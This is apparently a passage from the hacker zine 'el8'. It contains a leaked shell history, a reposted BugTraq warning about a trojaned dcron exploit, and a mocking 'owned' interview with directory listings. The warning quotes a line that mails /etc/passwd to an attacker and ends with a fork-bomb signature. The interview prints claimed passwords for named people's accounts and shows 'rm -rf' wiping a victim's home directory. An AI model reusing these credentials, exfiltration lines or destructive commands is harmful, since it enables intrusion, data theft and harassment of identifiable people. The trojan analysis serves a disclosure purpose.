cat ftptest rm ftptest rm -rf test rm text.X exit w finger lusta su - exit showmount su - exit ssh -l eginorio ssh.cisco.com ssh -l eginorio bigleague.cisco.com ssh -l eginorio paullew-ultra.cisco.com exit cd /users cd /home ls cd users/ ls cd ../wheel/ ls w finger geoff finger ficus deluser userdel remuser su - exit ls ssh attrition.org ssh 2600.com exit ssh 2600.com exit ssh 2600.com w exit nslookup phalse.2600.com nslookup phalse.2600.com ssh shocking.com exit ssh attrition.org ssh attrition.org ssh attrition.org exit ssh 2600.com ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org xit eixt exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit sh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh -l eginorio ssh.cisco.com exit ssh -l eginorio ssh.cisco.com ssh attrition.org exit ssh attrition.org ssh attrition.org~ ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit exit ssh attrition.org exit pwd ls cd lemon/ ls cd bronc/ ls cd bb ks ls cd .. ls -l cd code ls cd .. ls pwd cd .. ls -l cd .. 
ls -l cd www ls ls l cd .. ls -l cd ap ls ls -l cd .. cd code ls cd .. ls -l w exit ls hosts host ifconfig -a /sbin/ifconfig -a cat /etc/host cat /etc/hosts cat /etc/host.conf netstat -a w /sbin/ifconfig -a nslookup 199.1.199.115 nslookup 199.1.199.114 nslookup 199.1.199.113 xaric --help xaric -H underpaid.sysadmins.com w /sbin/ifconfig -a nslookup 199.1.199.199 nslookup 199.1.199.122 nslookup 199.1.199.100 xaric -H 3dfxlinux.com nslookup 199.1.199.101 nslookup 199.1.199.102 nslookup 199.1.199.103 xaric -H asskick.com traceroute web2.sea.nwserv.com whois nwserv.com whois nwserv.com@whois.networksolutions.com w exit ssh attrition.org exit ls cd code/ ls cd .. ls cd lame/ ls less qpop.c clear exit finger lusta w w ifconfig -a /usr/sbin/ifconfig 0a /sbin/ifconfig -a w finger jamf nslookup 209.107.55.2 ftp ftp.bitchx.org ls ls -l ircii-pana-75p3.tar.gz w host -l vhost.shocking.com /hostname hostname BitchX w xaric bronc us.undernet.org w w write jamf w w w w w w w write jamf w exit w w write jamf w ps aux|grep jamf w exit w exit w exit su- underpaid exit w exit passwd w ftp localhost ls ls ls ls ls -l ENSC.opx passwd w ps aux|grep bronc kill -9 13856 ls ftp fingers.shocking.com exit w finger jamf exit ls cd co cd code ls tar -tv ssh-1.2.25.tar.gz cd .. ls cd lemon/ ls ls -l cd bronc/ sl ls cd code/ ls cd .. cd 0day/ l;s ls less sshdexp.c cd ls cd ap/ ls cd exit .~e~----------------------------------------------------------~e~. ; *09* lcamtuff helps ~el8 -- lcamtuf ; `----------------------------------------------------------------' To: BugTraq Subject: yet another fake exploit making rounds Date: Dec 20 2001 8:58PM Author: Michal Zalewski Message-ID: Hello, Most recent (third) issue of "el8" zine, available at http://el8.8m.com, among other things claims to have a "0-day" dcron exploit, allegedely coded by me and Rafal Wojtczuk (Nergal). /*************************************************************************\ | ----====----====---- . . LOCAL DCRON EXPLOIT . . 
----====----====---- | | | | brought to you by | | | | (C) Michal Zalewski . and . Nergal | | | | ----------------------------------------------------------------------- | | Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] | | ----------------------------------------------------------------------- | | | \*************************************************************************/ [...cut...] This so-called exploit is already making rounds, not only in script kiddie community, but also being run by many admins to test their boxes. I got reports from several people letting me know "it did not work". I looked at it, and it appears to be a very nicely crafted trojan horse. It does send your /etc/passwd file to a fixed address your-address@mail.com (source code suggests this is only a default, and can be changed by the victim, but because of always true conditional expression, user-specified value is overwritten later; this mailbox is probably valid and attended): /.../ email_address=(char*)strdup(optarg); break; /.../ if(email_address) { email_address=DEFAULT_EMAIL_ADDRESS; } /.../ fprintf(temp,"mail %s < /etc/passwd\n",email_address); Other than that, this exploit will also create a suid copy of /bin/bash in /tmp directory, named 'boomsh'. Even if it was not executed as root, it still gives the attacker an opportunity to escalate privileges locally and gain access to other accounts, perhaps after guessing at least one password. You probably do not want to run this exploit, the same applies to all other exploits coming from untrusted sources =) -- _____________________________________________________ Michal Zalewski [lcamtuf@bos.bindview.com] [security] [http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};: =-=> Did you know that clones never use mirrors? <=-= http://lcamtuf.coredump.cx/photo/ .~e~----------------------------------------------------------~e~. 
; *10* lyfestylez of the owned and lamest with jobe -- r0b1nleech; `----------------------------------------------------------------' PART ONE: *** emmanuel'skidsex is now known as r0b1nleech *** Hello, and welcome to the lyfestylez of the owned and + lamest. yoyoyo Unlike in our previous episode, in which we interviewed + pm of sneakerz.org, our next guest, HAS BEEN OWNED (many times). dont do drugs! Everybody, welcome jobe!! jobe is also a w00w00 affiliate. Pardon jobe's behaviour, he just did a line of coke and some + heroin. Ok, what's this, he's wiggling his arms and flailing his legs. Oh nevermind he's raving, ok back to the subject at hand. hey everyone i am jobe, also known as, jbowie, or FATALIST OF BoW. What is your claim to fame? i have shells on numerous hacker boxes, i have been owned many times, + and i have been busted for hacking autonet. oh also i have a sparc, i coded a solaris login exploit (THANKS DUKE), + and i almost spoke at cansecwest. CULT HERO! As you can see we have a very skilled individual here. im also famous for w00giving, i wrote a cron exploit (fuck you vix) i also helped shok get laid! The list keeps going and going :) hey mom, pm, dr, jduck, w00w00, hert, teso, BoW! Shut the fuck up already or I'll drop your spools. ok.. sorry We'll be right back after these messages. PART TWO: Ok jobe, show us around your hacker network. i would also like to state that dropstatd and udpshell are elite ok fine, lets checkout my HERT homedir first (yo gaius!) $ ssh -l jobe np9.hert.org jobe@np9.hert.org's password: abc123hert ! W3lKuM t0 H3Rt HaKr EmErGencY ReSP0nZe Te4M'z NeTw0rK ! ! d0nt h4k, 0r h4ck uz, 0r g3t h4ck3d pl3aSe, itS B4D ! $ ls -al drwxr-x--- 39 jobe jobe 6144 . drwxr-xr-x 72 root wheel 1536 .. 
drwx------ 3 jobe jobe 512 .BitchX -rw-r--r-- 1 jobe jobe 0 .addressbook -rw------- 1 jobe jobe 2285 .addressbook.lu -rw-r--r-- 1 jobe jobe 6353 .bash_history -rw-r--r-- 1 jobe jobe 667 .bash_profile -rw-r--r-- 1 jobe jobe 651 .cshrc drwx------ 2 jobe jobe 512 .gnupg -rw-r--r-- 1 jobe jobe 255 .login -rw-r--r-- 1 jobe jobe 160 .login_conf -rw------- 1 jobe jobe 371 .mail_aliases -rw-r--r-- 1 jobe jobe 105 .mailrc -rw------- 1 jobe jobe 301 .mysql_history -rw-r--r-- 1 jobe jobe 892212 .phoenix.away -rw------- 1 jobe jobe 8192 .pine-debug1 -rw------- 1 jobe jobe 14247 .pine-debug2 -rw------- 1 jobe jobe 8633 .pine-debug3 -rw------- 1 jobe jobe 7415 .pine-debug4 -rw-r--r-- 1 jobe jobe 11450 .pinerc -rw-r--r-- 1 jobe jobe 69 .profile -rw------- 1 jobe jobe 65 .rhosts -rw-r--r-- 1 jobe jobe 852 .shrc drwxr-xr-x 2 jobe jobe 512 .ssh -rw------- 1 jobe jobe 5316 .viminfo -rw-r--r-- 1 jobe jobe 1003 .vimrc -rw------- 1 jobe jobe 16384 .w00t;.swp -rw------- 1 jobe jobe 1198086 2 drwx--x--x 2 jobe jobe 512 3wahas -rw-r--r-- 1 jobe jobe 8356 3wahas-0.0.1.tar.gz -rw------- 1 jobe jobe 68 4rkl.sh -rw-r--r-- 1 jobe jobe 25974 7350854.c -rw-rw-r-- 1 jobe jobe 29108 ADMmutate-0.8.4.tar.gz drwxr-xr-x 9 jobe jobe 512 BSD -rw------- 1 jobe jobe 1527808 BitchX-1.0c18.core -rw------- 1 jobe jobe 12288 Bowie_Jonathan.doc -r--r--r-- 1 jobe jobe 116408 CHANGES -rw-r--r-- 1 jobe jobe 4781 Collector-1.0.tar.gz -rw------- 1 jobe jobe 24064 Dear Customer.Terracava-Teamdoc.doc -rw------- 1 jobe jobe 1638716 DiabloHack.exe -rw-r--r-- 1 jobe jobe 90 FILE_ID.DIZ drwx------ 3 jobe jobe 512 FreeBSD -rw-r--r-- 1 jobe jobe 7655 Hunter-1.2.tar.gz drwxr-xr-x 2 jobe jobe 512 ICMP-Tunnel_P4-1.0 -rw-r--r-- 1 jobe jobe 7011 ICMP-Tunnel_P4-1.0.tar.gz -rw-rw-r-- 1 jobe jobe 20572160 IDA4.04.tar -r--r--r-- 1 jobe jobe 4190 INSTALL -rw-r--r-- 1 jobe jobe 11776 Jonathan_Bowie_Resume.doc -rw-r--r-- 1 jobe jobe 84854 Lazlov1.01.tar.gz drwx------ 2 jobe jobe 512 Mail -rw------- 1 jobe jobe 15098359 Mailbox 
-r--r--r-- 1 jobe jobe 26150 Makefile -rw-r--r-- 1 jobe jobe 3881088 Mushroomhead_-_Born_Of_Desire.mp3 -r--r--r-- 1 jobe jobe 21567 OPTIONS -rw------- 1 jobe jobe 944 OSDnew.c -rw------- 1 jobe jobe 990 OSDump.c -rw------- 1 jobe jobe 1224 OSDump.tar.gz -rw-r--r-- 1 jobe jobe 1570944 Opie_and_Anthony_-_Steven_Lynch_-_Special_Olympics.mp3 -rw------- 1 jobe jobe 64240 Picture 17.jpg -rw-r--r-- 1 jobe jobe 2252 README -rw------- 1 jobe jobe 1056 README.osdump -rw------- 1 jobe jobe 5326 README2.TXT -rw------- 1 jobe jobe 7264 SKDoS%s%s%s -rw-r--r-- 1 jobe jobe 6246 Searcher-8.0.tar.gz -rw-r--r-- 1 jobe jobe 16744 Smeagol-4.4.4.tar.gz -rw-r--r-- 1 jobe jobe 1570944 Special_Olympics.mp3 -rw-r--r-- 1 jobe jobe 13547520 System_Of_A_Down.tar -r--r--r-- 1 jobe jobe 10156 TODO -rw-r--r-- 1 jobe jobe 2091383 Theyre_Coming_To_Take_Me_Away.mp3 -rw-rw-r-- 1 jobe jobe 1285708 U4CERT1.WAV -rw-rw-r-- 1 jobe jobe 4077144 U4CERT2.WAV -rw-r--r-- 1 jobe jobe 2055 UnderDC.txt -rw-r--r-- 1 jobe jobe 13506560 WildPackets.AiroPeek.v1.0_Win9xNT2K-DOD.tar -rw------- 1 jobe jobe 63583 WinSCPv0.1b.zip -rw------- 1 jobe jobe 4712086 anet.tar.gz -rw------- 1 jobe jobe 52981760 aux88-electro_boogie.tar -rw-r--r-- 1 jobe jobe 17301 bfx.c -rwxr-xr-x 2 jobe jobe 512 bin -rw-r--r-- 1 jobe jobe 477 bind-4.9.6-REL.tar.gz -rw-r--r-- 1 jobe jobe 2003579 bind-4.9.7-REL.tar.gz -rw------- 1 jobe jobe 465 blah -rw------- 1 jobe jobe 23 blah.c -rw------- 1 jobe jobe 6039 blah.htm -rw------- 1 jobe jobe 958 blahg -rw-rw-r-- 1 jobe jobe 12330 bll -rw-r--r-- 1 jobe jobe 428 blurb -rw------- 1 jobe jobe 0 boo -rw-r--r-- 1 jobe jobe 6204 breal_sm.jpg -rw------- 1 jobe jobe 16701 bud.jpg -rw-rw-r-- 1 jobe jobe 1998216 c06-snmpv1-req-app-r1.jar -rw-rw-r-- 1 jobe jobe 18749 c06-snmpv1-req-enc-r1.jar -rw-r--r-- 1 jobe jobe 27989 cardSelection.pdf -rw-r--r-- 1 jobe jobe 68997120 carlin.tar -rw------- 1 jobe jobe 416 cc1.cc -rw------- 1 jobe jobe 884 cc2.cc -rw-r--r-- 1 jobe jobe 83690221 cde-src.tar.gz -rw------- 1 
jobe jobe 564624 cdrtools-1.9a03-win32-bin.zip -rw-r--r-- 1 jobe jobe 1563 cgixperl.sh -rw-r--r-- 1 jobe jobe 4483 cgs.c -rw-r--r-- 1 jobe jobe 220133 charmaps-0.0.tar.gz -rw-r--r-- 1 jobe jobe 1797 cl.pl -rw-r--r-- 1 jobe jobe 3339 clear-1.3.tar.gz -rw-r--r-- 1 jobe jobe 10596 cmctlSparc -rw-r--r-- 1 jobe jobe 1309 cmctlSparc.c drwx------ 2 jobe jobe 512 cmsd -rw------- 1 jobe jobe 6954 cmsd-horizon.tar.gz -rw-r--r-- 1 jobe jobe 1872 cnt-svr-filetransfer.tar.gz drwxr-xr-x 5 jobe jobe 512 compat drwxr-xr-x 3 jobe jobe 512 conf drwxr-xr-x 28 jobe jobe 512 contrib -rwx------ 1 jobe jobe 16384 cpkey.exe -rw-r--r-- 1 jobe jobe 142 cpu -rw-r--r-- 1 jobe jobe 16126 crash_1.gz -rw-r--r-- 1 jobe jobe 16126 crash_2.gz -rw-r--r-- 1 jobe jobe 16126 crash_3.gz -rw-r--r-- 1 jobe jobe 16126 crash_4.gz -rw-r--r-- 1 jobe jobe 16126 crash_5.gz -rw-r--r-- 1 jobe jobe 16126 crash_6.gz -rw-r--r-- 1 jobe jobe 2032769 daemon.xpm -rw-r--r-- 1 jobe jobe 1438 daemonshell.tar.gz -rw------- 1 jobe jobe 573 dead.letter -rw-r--r-- 1 jobe jobe 14763 deefaced.jpg -rw-r--r-- 1 jobe jobe 3437 discover.c -rw-r--r-- 1 jobe jobe 557056 dm_vmw301.zip drwxr-xr-x 6 jobe jobe 512 doc -rwx------ 1 jobe jobe 32768 dropstat -rw-r--r-- 1 jobe jobe 2368 dstatd.c -rw-r--r-- 1 jobe jobe 2122 dtcrash1.pl -rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl -rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl.494 -rw-r--r-- 1 jobe jobe 31569 dtfuck.c -rw-r--r-- 1 jobe jobe 31433 dtspcd_ex_v4.c -rw------- 1 jobe jobe 20050 elfvirii.tar.gz -rw-r--r-- 1 jobe jobe 4820 epcs2.c -rw-r--r-- 1 jobe jobe 4820 epcs2.c.773 -rw-r--r-- 1 jobe jobe 4820 epcs2_fix.c -rwxr-xr-x 1 jobe jobe 5355 er -rw-r--r-- 1 jobe jobe 10074 errors -rw-r--r-- 1 jobe jobe 13357 ex_sol8_login_x86.c -rw-r--r-- 1 jobe jobe 753 exdt-h.txt -rw-r--r-- 1 jobe jobe 1045 exec_race.c drwxrwxr-x 2 jobe jobe 1024 fbsd-src drwxr-xr-x 3 jobe jobe 512 fingerd-fileserver -rw-r--r-- 1 jobe jobe 2937 fingerd-fileserver.tar.gz -rw------- 1 jobe jobe 7126 flyswatter.c -rw-r--r-- 1 jobe jobe 
231237 foo.jpg -rw------- 1 jobe force 20992 forbowie.doc -rw------- 1 jobe jobe 24655 forbowie.jpg drwx------ 6 jobe jobe 512 frequency -rw-r--r-- 1 jobe jobe 70090 frequency.tar.gz -rw-r--r-- 1 jobe jobe 17374 fuck.ico -rw-r--r-- 1 jobe jobe 3209 g.c -rw------- 1 jobe jobe 499200 gzip-solaris-2.6-sparc -rw-r--r-- 1 jobe jobe 74 haha -rwxrwxr-x 1 jobe jobe 5005 hair -rw-rw-r-- 1 jobe jobe 477 hair.c -rw------- 1 jobe jobe 22481 hellkit-1.2.tar.gz -rw-r--r-- 1 jobe jobe 1129880 hellodownthere.mpeg -rw-rw-r-- 1 jobe jobe 1635 here.txt -rw------- 1 jobe jobe 15 home.ip -rw-r--r-- 1 jobe jobe 11028 hooklive.c -rw-r--r-- 1 jobe jobe 3133 ia64-linux-execve.cs -rw-r--r-- 1 jobe jobe 1735738 iheartyp drwxr-xr-x 3 jobe jobe 512 include -rw-rw-r-- 1 jobe jobe 772 install.sh -rwxrwxr-x 1 jobe jobe 786028 irc -rw------- 1 jobe jobe 1413120 irc.core -rw------- 1 jobe jobe 3314 irc.log.#phrack drwxrwxr-x 9 jobe jobe 1024 ircii-2.9 -rw-rw-r-- 1 jobe jobe 530294 ircii-2.9-roof.tar.gz -rw------- 1 jobe jobe 6649 irclog.ex -rw------- 1 jobe jobe 5593056 irclog.ex.#!teso -rw------- 1 jobe jobe 2619481 irclog.ex.#!wutang -rw-rw-r-- 1 jobe jobe 18749 j@24.128.147.68 -rw-r--r-- 1 jobe jobe 123738 j@pot.star.delta9-tetrahydrocannabinol.net -rw------- 1 jobe jobe 12288 jbowie_resume.doc -rw-rw-r-- 1 jobe jobe 11 joel.num -rw------- 1 jobe jobe 13333 kain.jpg drwxr-xr-x 2 jobe jobe 512 kfb -rw------- 1 jobe jobe 1812 kfb.tar.gz -rw-rw-r-- 1 jobe jobe 138 kotter.sults drwx------ 2 jobe jobe 512 ldv3 drwx------ 3 jobe jobe 512 ldv6 -rw------- 1 jobe jobe 233325 libnet.tar.gz -rw-r--r-- 1 jobe jobe 6605 license.dat -rw-r--r-- 1 jobe jobe 17391 linspy-for-2.2.x.tgz -rw-rw-r-- 1 jobe jobe 5465996 linux-2.2.16.tar.gz -rw------- 1 jobe force 1978 lolita.c -rw------- 1 jobe jobe 14065 lsd.telnet -rw-r--r-- 1 jobe jobe 73338 m00 drwx------ 2 jobe jobe 512 mail drwxr-xr-x 2 jobe jobe 512 man -rw-r--r-- 1 jobe jobe 46669824 miabang01.mpeg -rwx------ 1 jobe jobe 48735 modctl.c -rw------- 1 jobe jobe 
369012 more.core -rw-r--r-- 1 jobe jobe 123738 multiscan-0.8.5.tar.gz -rwxrwxr-x 1 jobe jobe 1192226 mutt drwxrwxr-x 9 jobe jobe 5120 mutt-1.2.5 -rw-r--r-- 1 jobe jobe 1973923 mutt-1.2.5i.tar.gz -rwx--x--x 1 jobe jobe 1198086 mutt2 -rw------- 1 jobe jobe 1696777 n4pst3r.exe -rw-rw-r-- 1 jobe jobe 1738 n4rf drwxr-xr-x 2 jobe jobe 1024 named -rw------- 1 jobe jobe 2581 netbackup_exec.pl -rw------- 1 jobe jobe 1143664 new.mp3 -rw-r--r-- 1 jobe jobe 10061 newhert.txt -rw-r--r-- 1 jobe jobe 282701 odbc.doc.tar.gz -rw-r--r-- 1 jobe jobe 293 optyx.stuff -rw-r--r-- 1 jobe jobe 1527342 outfile -rw-r--r-- 1 jobe jobe 1527342 outfile -rw-r--r-- 1 jobe jobe 58593 patch-1.2.5.rr.compressed.1 drwxr-xr-x 2 jobe jobe 512 paz-1.0 -rw-r--r-- 1 jobe jobe 1684 paz-1.0.tar.gz -rw------- 1 jobe jobe 7704 pc_sice3.zip -rw-r--r-- 1 jobe jobe 338 pcic.out -rw------- 1 jobe jobe 7918 pcnfsd-priv.tar.gz drwx------ 2 jobe jobe 512 pcnfsd_remote -rw------- 1 jobe jobe 142046 penguins.zip -rw------- 1 jobe jobe 161242 pf.irc -rw------- 1 jobe jobe 72171 phear-r0ute.gif -rw------- 1 jobe jobe 2595 pomah.sh -rw------- 1 jobe jobe 0 postponed -rw------- 1 jobe jobe 16124 prettyweed.jpg -rw-r--r-- 1 jobe jobe 2770 probe-2.3.tar.gz -rw-r--r-- 1 jobe jobe 599 readme -rw------- 1 jobe jobe 42247 redir-2.2.1.tar.gz drwxr-xr-x 2 jobe jobe 1024 res -rw-r--r-- 1 jobe jobe 16000 rough.notes -rw------- 1 jobe jobe 7714 rsi-fbsd3.0.tgz -rw-rw-r-- 1 jobe jobe 18 server -rwxr-xr-x 1 jobe jobe 172032 sgiawd-lmcrypt -rwxr-xr-x 1 jobe jobe 293004 sgifd-lmcrypt drwxrwxr-x 6 jobe jobe 512 shellkit -rw-rw-r-- 1 jobe jobe 16370 shellkit-20010618.tgz drwxr-xr-x 7 jobe jobe 512 shres -rw-r--r-- 1 jobe jobe 13076 sl-binary-kit.tar.gz.pgp -rw------- 1 jobe jobe 449 spoof.c -rw------- 1 jobe jobe 3235 spooflib.c drwxr-xr-x 4 jobe jobe 512 src -rw-r--r-- 1 jobe jobe 1911375 ssh-2.4.0.tar.gz -rw-r--r-- 1 jobe jobe 300240 sshd.stuff.tar.gz -rw-r--r-- 1 jobe jobe 45337 sshd_exp.tgz -rw-rw-r-- 1 jobe jobe 6444 strmod 
-rwx------ 1 jobe jobe 5442 strmod.c -rw------- 1 jobe jobe 2707 strmod.tar.gz -rwxr-xr-x 1 jobe jobe 14754 strs -rw-r--r-- 1 jobe jobe 294 strs.c -rw-r--r-- 1 jobe jobe 6360 t-shirt-4.0.tar.gz -rw-r--r-- 1 jobe jobe 2123 t3.c -rwxr-xr-x 1 jobe jobe 27505 tb -rw-r--r-- 1 jobe jobe 68401 thc-uht1.tgz -rwxr-xr-x 1 jobe jobe 14754 tmp -rw------- 1 jobe jobe 26 tmp.c drwxr-xr-x 3 jobe jobe 512 tools -rw-r--r-- 1 jobe jobe 18860 tsl_bind.c -rw------- 1 jobe jobe 9886 ttdb4sol26.c -rw------- 1 jobe jobe 10150 ttnew.c drwx------ 2 jobe jobe 512 tx -rw-r--r-- 1 jobe jobe 23145 tx.tar.gz -rw------- 1 jobe jobe 5290472 utssrc.tar.gz -rwx------ 1 jobe jobe 275 w.pl -rw------- 1 jobe jobe 8385 w00lien-20020217.tgz -rw-rw-r-- 1 jobe jobe 28218 w00t; -rw------- 1 jobe jobe 3338 w1.sh -rw------- 1 jobe jobe 3453 w1ng.sh drwxr-xr-x 2 jobe jobe 512 wepcrack-v0.3 -rw------- 1 jobe jobe 8771 wepcrack-v0.3.tar.gz -rw------- 1 jobe jobe 2762 win2kfaq.txt drwxrwxr-x 4 jobe jobe 1024 winpenguins drwx------ 2 jobe jobe 512 worm -rw------- 1 jobe jobe 24088 worm-src.tar.gz -rw-r--r-- 1 jobe jobe 3469 wuftpfmt.pl -rw------- 1 jobe jobe 58909 xenv2.tgz -rw-r--r-- 1 jobe jobe 4949600 ya_it_doez.mp3 -rw-r--r-- 1 jobe jobe 3176 zap3.tar.gz Awesome homedir, you are an old school hacker it seems. well i started hacking phone switches and then moved on to redhat + systems. i'm currently into darwin systems. lots of porn on those. Your email is huge! fuck yah man i g0t so much email im subscribed to securityfocus bugtraq incidents w00w00 list vuln dev hert private mailing list teso private mailing list teso public mailing list hert public mailing list vuln dev honeypots private BoW mailing list raver's mailing list the porn trader's mailing list also the dropstatd withdrawl mailing list What is in your .phoenixaway? everything anyone has messaged me since 1996. I PUT SMILEY FACES IN SHELLCODE BECAUSE IT MAKES ME HAPPY Ok I am going to rm your hert home dir now ok? 
no problem, let me back it up first No. $ rm -rNOOOOOOOOOOOf ~jobeOFKAG@K@#3,2#F_EKGFDS $ rm -rf ~jobe $ ^C^D^D <[rooster]> jbl: i am in the process of interviewing at enterasys i got an interview with a staffing firm tomorrow morning with mcdonalds > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D damn that sux hi homo jobe you tool *jeru* howd you own him? *jeru* howd you own him? > *jeru* howd you own him? if he ownz np9 it's not that hard. NOTE TO SELF, IT HAS NO SUIDS, NO PUBLIC VULNS, HOW COULD JOBE OWN IT? > WOOWOO IS NEXT > JNATHAN IS NEXT > YOUR FUCKED KID lol NOTE TO SELF, vmy lol, VMY GOT OWNED ONCE! man noone ever gets rmed any more > ILL RM YOU NEXT PUSSY duh like the whole world doesn't know my passwd's NOT TO SELF, GOD JOBE IS A FUCKING IDIOT uh go for it bro > duh like the whole world doesn't know my passwd's > duh like the whole world doesn't know my passwd's hey thats not funny stop Ok, take us to the next stop along the tour. lets check out slack.net next. $ ssh -l jbowie slack.net jbowie@slack.net's password: abc123slack here is my homedir: $ ls -al drwxr-x--x 9 jbowie jbowie 2560 . drwxr-xr-x 807 root wheel 13312 .. 
-rw-r--r-- 1 jbowie jbowie 51 .addressbook -rw-r--r-- 1 jbowie jbowie 2342 .addressbook.lu -rw-r--r-- 1 jbowie jbowie 117 .bash_history -rw-r--r-- 1 jbowie jbowie 716 .cshrc -rw------- 1 jbowie jbowie 2314 .history -rw-r--r-- 1 jbowie jbowie 322 .irc.easyinst.status -rw-r--r-- 1 jbowie jbowie 12 .ircrc -rw-r--r-- 1 jbowie jbowie 233 .login -rw-r--r-- 1 jbowie jbowie 105 .mailrc -rw-r--r-- 1 jbowie jbowie 1148 .phoenix -rw-r--r-- 1 jbowie jbowie 18841 .phoenix.away -rw------- 1 jbowie jbowie 8191 .pine-debug1 -rw------- 1 jbowie jbowie 19392 .pine-debug2 -rw------- 1 jbowie jbowie 9905 .pine-debug3 -rw------- 1 jbowie jbowie 7737 .pine-debug4 -rw-r--r-- 1 jbowie jbowie 11891 .pinerc -rw-r--r-- 1 jbowie jbowie 114 .profile lrwxr-xr-x 1 jbowie jbowie 9 .rhosts -> /dev/null drwxr-xr-x 2 jbowie jbowie 512 .ssh drwxr-xr-x 5 jbowie jbowie 512 .tin -rw-r--r-- 1 jbowie jbowie 15 475.shtml -rw-r--r-- 1 jbowie jbowie 15 547.shtml -rw-r--r-- 1 jbowie jbowie 6952 574.shtml -rw-r--r-- 1 jbowie jbowie 15 745.shtml -rw-r--r-- 1 jbowie jbowie 15 754.shtml -rw-r--r-- 1 jbowie jbowie 192540 BIOS.ZIP -rw------- 1 jbowie jbowie 51591041 Mailbox -rw-rw-rw- 1 jbowie jbowie 0 Mailbox.lock.949010036.18118.schwing -rw-r--r-- 1 jbowie jbowie 0 Mailbox.lock.953165142.7684.schwing -rw-r--r-- 1 jbowie jbowie 481 Makefile -rw-r--r-- 1 jbowie jbowie 179 README drwxr-xr-x 2 jbowie jbowie 512 WWW -rw-r--r-- 1 jbowie jbowie 1100 a -rwxr-xr-x 1 jbowie jbowie 14758 add -rw-r--r-- 1 jbowie jbowie 80 add.c -rw-r--r-- 1 jbowie jbowie 591 arbcmdsc.tar.gz -rw-r--r-- 1 jbowie jbowie 400 asm.c -rw------- 1 jbowie jbowie 532480 authlie-1.0.tar -rw-r--r-- 1 jbowie jbowie 34816 benefits.doc -rw-r--r-- 1 jbowie jbowie 1244994 bind-src.tar.gz -rw-r--r-- 1 jbowie jbowie 4947 bind8.html -rw-r--r-- 1 jbowie jbowie 596 blah -rw-r--r-- 1 jbowie jbowie 1187 blah.htmnl -rw-r--r-- 1 jbowie jbowie 2779 blah.lm -rw-r--r-- 1 jbowie jbowie 596 blah.new -rw-r--r-- 1 jbowie jbowie 274 blah.sort -rwxr-xr-x 1 jbowie jbowie 6174 
bufmod.7 -rwxr-xr-x 1 jbowie jbowie 20566 cae -rw------- 1 jbowie jbowie 1282396 cae.core -rw-r--r-- 1 jbowie jbowie 375 cool.fortunes drwxr-xr-x 4 jbowie jbowie 512 cyberarmy -rw-r--r-- 1 jbowie jbowie 731 cyberarmy.exp.c -rw------- 1 jbowie jbowie 307 dead.letter -rw-r--r-- 1 jbowie jbowie 29819 dlcommon.c -rw-r--r-- 1 jbowie jbowie 1178 dlinfo.c -rw-r--r-- 1 jbowie jbowie 2493 dlmdata.c -rwxr-xr-x 1 jbowie jbowie 1937 dlpi.7 -rw-r--r-- 1 jbowie jbowie 3064 dlrcv.c -rw-r--r-- 1 jbowie jbowie 498 dltest.h -rw-r--r-- 1 jbowie jbowie 79264 dltest.ps -rwxr-xr-x 1 jbowie jbowie 39859 dltest.tar.gz -rw-r--r-- 1 jbowie jbowie 2727 dlunitdatareq.c -rw-r--r-- 1 jbowie jbowie 44544 dracon-olc.doc -rw-r--r-- 1 jbowie jbowie 0 dumb.c -rwxr-xr-x 1 jbowie jbowie 14779 f00 -rw-r--r-- 1 jbowie jbowie 3212 f00.c -rw------- 1 jbowie jbowie 348508 f00.core -rw------- 1 jbowie jbowie 348508 f00.core -rw-r--r-- 1 jbowie jbowie 274 findproc.c -rw-r--r-- 1 jbowie jbowie 30665 fornax-0.0.5.tar.gz -rwxr-xr-x 1 jbowie jbowie 4261 fp -rw------- 1 jbowie jbowie 1939 fts.c -rwxr-xr-x 1 jbowie jbowie 1248915 irc -rw-r--r-- 1 jbowie jbowie 530294 ircii-2.9-roof.tar.gz -rw------- 1 jbowie jbowie 5040 irclog.ex.#!w00w00 -rw-r--r-- 1 jbowie jbowie 1597856 jobe.attrition.tar.gz -rw-r--r-- 1 jbowie jbowie 2750 jobe.resume -rw-r--r-- 1 jbowie jbowie 4792 jobelog -rwxr-xr-x 1 jbowie jbowie 7710 le.7 -rw-r--r-- 1 jbowie jbowie 4914 lsa.synth drwx------ 2 jbowie jbowie 512 mail -rw-r--r-- 1 jbowie jbowie 1975 nap.c -rw-r--r-- 1 jbowie jbowie 4413 netmap.bmp.gz -rw-r--r-- 1 jbowie jbowie 594 new -rw-r--r-- 1 jbowie jbowie 456 new.procs -rw-r--r-- 1 jbowie jbowie 508 new.procs2 -rw-r--r-- 1 jbowie jbowie 916150 nsrouter.c675.2.3.0.053.bin -rw-r--r-- 1 jbowie jbowie 161242 pf.irc -rwxr-xr-x 1 jbowie jbowie 8268 pfmod.7 -rw-r--r-- 1 jbowie jbowie 480 procs -rw-r--r-- 1 jbowie jbowie 518 procs2 -rw-r--r-- 1 jbowie jbowie 3360 prym-log drwxr-xr-x 3 jbowie jbowie 512 public_html drwxr-xr-x 2 jbowie jbowie 512 
